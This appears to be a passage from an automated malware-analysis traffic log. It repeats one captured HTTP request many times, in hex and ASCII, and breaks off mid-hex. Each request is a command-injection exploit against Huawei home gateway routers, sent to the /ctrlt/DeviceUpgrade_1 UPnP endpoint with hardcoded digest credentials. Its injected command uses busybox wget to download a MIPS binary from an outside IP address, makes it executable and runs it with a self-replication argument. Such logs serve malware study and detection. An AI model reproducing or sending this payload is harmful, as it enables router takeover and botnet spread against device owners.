4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 